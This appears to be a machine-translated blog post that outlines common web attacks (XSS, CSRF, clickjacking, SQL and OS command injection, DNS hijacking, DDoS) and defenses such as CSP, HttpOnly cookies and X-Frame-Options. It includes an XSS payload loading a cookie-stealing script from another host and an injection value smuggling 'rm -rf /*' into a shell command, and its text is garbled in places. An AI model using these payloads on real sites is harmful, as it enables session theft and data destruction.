Common Web attack modes

XSS attack – Steal login status information

Define cross-site scripting attacks, which mainly use JavaScript to inject code into websites for the purpose of stealing numbers and data.

classification

  • reflective
http:// localhost: 3000 /? The from = < script SRC = "http://localhost:4000/hack.js" > < / script > / / domain name forge https://dwz.cn/Copy the code
A) Generate a short link url b) let users click to steal the login state information and put cookies in the browser to simulate user loginCopy the code
  • Storage – Stored in DB and then injected when read
/ / cross site scripting injection on me < script SRC = "http://localhost:4000/hack.js" > < / script >Copy the code

Once injected, it lasts forever, and the information of the logged-in user is always sent to the hacker

For the above two attacks

Ctx. set(' x-xss-protection ', 0) // Disable XSS filteringCopy the code

0 Disable XSS filtering. 1 Enable XSS filtering (usually by default). If a cross-site scripting attack is detected, the browser clears the page (removing unsafe parts)

Defense strategy

1. Content security policy

Content Security Policy (CSP) is an additional Security layer designed to help detect and mitigate certain types of attacks, including cross-site scripting XSS and data injection attacks

CSP is essentially a whitelist. Developers explicitly tell the browser which external resources can be loaded and executed. We just need to configure the rules

Content-security-policy: default-src 'self' // Content-security-policy: Img-src 'https://*' // Content-security-policy does not allow loading of any source framework: child-src 'none' ctx.set('Content-Security-Policy', 'default-src', 'self')Copy the code

2. Escape characters

Ejs escape tips

<% code %> is used for execution where JavaScript code <%= code %> will be HTML escaped for code <% -code %> will not be escapedCopy the code

3. Blacklist

User input can never be trusted, and the most common way to do this is to escape input and output, escaping quotes, Angle brackets, and slashes

4. Whitelist – Whitelist library XSS

const xss = require('xss')
let html = xss('<h1>XSS Demo</h1>')
Copy the code

5, HttpOnly cookies

This is the most effective defense against XSS attacks to steal users’ cookies. When web applications set cookies, their attribute is set to HttpOnly, which can avoid the site’s cookies being stolen by malicious JavaScript clients and protect users’ cookie information

response.addHeader('Set-Cookie', 'uid-112; Path=/; HttpOnly')Copy the code

CSRF attack – Use login state information

Definition: a cross-site forgery request that uses a user’s logged-in identity to complete an illegal operation on the user’s behalf without the user’s knowledge:

  • The user has waited for site A and logged the cookie locally
  • Without logging out of site A (that is, with the cookie in effect), the user visits the lure hazard site B provided by the malicious attacker (site B requires access to site A)
  • Site A does not do any SCRF defense

Defense way

  • Referer Check Https does not send referer (useless)
app.use(async (ctx, next) => {
    await next()
    const referer = ctx.request.header.referer
    console.log('Referer', referer)
})
Copy the code
  • Verification code Man-machine graphics verification code + SMS
  • Cookie values hash: Attackers during A visit to A trusted website, although the browser can take A cookie in the request, but the site is not just A cookie to judge the user identity, at the same time through the content of the users to send over the forging machine number (graphical verification code, mobile phone text message authentication code) to determine the request is real users to send, the attacker in the request, A Cannot generate pseudo-random numbers (values hashed through cookies) in submitted content

Clickjacking –

Definition: Click hijacking is an attack method of visual Angle deception. The attacker will embed the website to be attacked in the way of iframe nesting, and set the IFrame to be transparent, revealing a button in the page to induce the user to click

Defense way

  • X-FRAME-OPTIONS

X-frame-options is an HTTP response header that is well supported in modern browsers. This HTTP response header is designed to defend against iframe nested clickjacking attacks. The response header has three values

  1. DENY indicates that the page is not allowed to be displayed in the iframe mode
  2. SAMEORIGIN says pages can be displayed in the same domain using an IFrame
  3. Allow-from indicates that the page can be displayed in the iframe of the specified source
cxt.set('X-FRAME-OPTIONS', DENY)
Copy the code
  • JS way
<head> <style id="click-jack"> html { display: none ! important; } </style> </head> <body> <script> // self is a reference to the current window itself, and the window property is equivalent. If the browser window (self = = top) {var style = document. GetElementById (' click - jack) document. The body. The removeChild (style)} else { top.location = self.location } </script> </body>Copy the code

What this code does is that when loading a page using an iframe, the hidden page at the bottom does not display all the content

SQL injection

Definition: direct attack system database, can achieve database level operation, steal data

File upload vulnerability

Definition: A user uploads an executable script file (usually PHP) using the Windows file naming rules and obtains the ability to run commands on the server through this script file

OS injection

The definition of OS command injection is similar to SQL injection, except that SQL injection is for the database, while OS command injection is for the operating system. OS command injection attack refers to the execution of illegal operating system commands through web applications to achieve the purpose of attack. As long as shell functions can be called, There is a risk that if the shell is called negligently, it can execute an illegal command inserted

// Take Node.js as an example, Repo const exec = require('mz/child_process'). Exec let params = {// ${params.repo} /some/path`) // https://github.com/xx/xx.git && rm -rf /* &&Copy the code

The request was hijacked

  • DNS hijacking

As the name implies, the DNS server (the various steps of DNS resolution) was tampered with, modifying the result of domain name resolution, so that access to the IP is not the expected www.baidu.com -> IP -> wifi -> DHCP -> DNS -> hacker server

  • HTTP hijacked

Carrier hijacking, at this point probably can only upgrade HTTPS

DDOS

Definition: DDOS is not an attack, but the categories of the floorboard of the attack, it has more than ten kinds, new attack methods continued invented, and site operation of each link, all can be a target, just put a link, make the whole process, run not to stand up to reach down service purposes Among them, the more common a attack is cc attack, It is a common attack that simply sends a large number of normal requests, exceeding the maximum capacity of the server and causing downtime

  • SYN Flood

This attack exploits the TCP handshake by sending a large number of TCP ‘initial connection request’ SYN packets to the target with a spurious source IP address. The target machine responds to each connection request and then waits for the last step in the handshake, which never happens, depleting the target resources in the process

  • HTTP Flood

This attack is similar to hitting the refresh button in a Web browser repeatedly on multiple different computers at the same time, flooding the server with HTTP requests and causing denial of service

defense

  • The backup site

Backup sites do not have to be fully functional, if you can achieve full static browsing, can meet the needs. At the very least, it should be possible to display an announcement telling the user that the site is out of order and is working hard to fix it

  • HTTP request interception high anti-IP – reliable carrier

Hardware Server Firewall

– Bandwidth expansion + CDN to increase crime costs